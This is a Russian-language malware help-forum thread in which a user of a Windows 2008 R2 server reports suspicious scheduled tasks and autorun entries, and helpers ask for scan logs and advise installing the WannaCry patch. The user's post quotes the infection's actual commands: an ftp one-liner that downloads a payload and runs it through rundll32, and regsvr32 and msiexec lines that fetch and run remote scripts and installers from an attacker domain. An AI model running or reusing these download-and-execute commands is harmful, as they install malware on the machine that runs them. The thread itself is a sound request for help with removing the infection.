-
Подозрение на вредонос
Здравствуйте.
Система Windows 2008 R2, свежеустановленная работает около недели, устанавливал с образа скачанного с рутрекера.
Заметил в планировщике заданий несколько подозрительных заданий, а именно:
1) Mysa1
действие: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
2) Mysa2
действие: cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
3) ok
действие: rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Все эти задания настроены на выполнение при включении компьютера.
Я удалил эти задания из планировщика, но потом они были добавлены туда сного[COLOR=red].[/COLOR]
В директории c:\windows\debug\ файлов item.dat, s.dat и ok.dat я не обнаружил, но возможно они удаляются после отправки на ftp
Также увидел, что в автозагрузке сидит такое:
regsvr32 /u /s /i:[URL]http://js.mykings.top:280/v.sct[/URL] scrobj.dll
msiexec.exe /i [URL]http://js.mykings.top:280/helloworld.msi[/URL] /q
В редакторе реестра удалил эти записи из автозагрузки.
Подскажите пожалуйста, это вредонос или у меня паранойя?
Также дополнительно запустил проверку Dr.Web Scanner SE for Windows v9.1.4.01271:
\WMI\root\subscription\ActiveScriptEventConsumer {266c72e7-62e8-11d1-ad89-00c04fd8fdff}\ScriptText - infected with Trojan.MulDrop7.29574
\WMI\root\subscription\ActiveScriptEventConsumer {266c72e7-62e8-11d1-ad89-00c04fd8fdff}\ScriptText - infected
Process \Device\HarddiskVolume2\Program Files (x86)\1cv82\8.2.19.130\bin\1cv8.exe:3300 - infected with Trojan.Eps.38782
Microsoft Security Essentials нашел
Ransom:Win32/WannaCrypt
Объекты:
file:C:\Windows\qeriuwjhrf
file:C:\Windows\tasksche.exe
С Уважением, Дмитрий.
-
Уважаемый(ая) [B]bizisoft[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
-
Вечером запущу AutoLogger и HijackThis и предоставлю логи.
Прикрепляю логи от AutoLogger и HijackThis.
-
Все обновления для системы, включая патч против WannaCry, установите
-
[QUOTE=thyrex;1455618]Все обновления для системы, включая патч против WannaCry, установите[/QUOTE]
Установил обновления системы и дополнительно патч от windows 7 x64.
Большое спасибо за помощь.
-
Скачайте [url=http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/][b]Farbar Recovery Scan Tool[/b][/url] [img]http://i.imgur.com/NAAC5Ba.png[/img] и сохраните на Рабочем столе.
[list][*][b]Примечание[/b]: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.[/list]
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите [b]Yes[/b] для соглашения с предупреждением.
2. Убедитесь, что в окне [b]Optional Scan[/b] отмечены [i]List BCD[/i], [i]Driver MD5[/i] и [i]90 Days Files[/i].
[img]http://i.imgur.com/3munStB.png[/img]
3. Нажмите кнопку [b]Scan[/b].
4. После окончания сканирования будет создан отчет ([b]FRST.txt[/b]) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет ([b]Addition.txt[/b]).
6. Отчеты, полученные в пп. 4 и 5, заархивируйте (в [b]один архив[/b]) и прикрепите к сообщению.
-
-
Плохого в логах не увидел
-
Page generated in 0.00680 seconds with 10 queries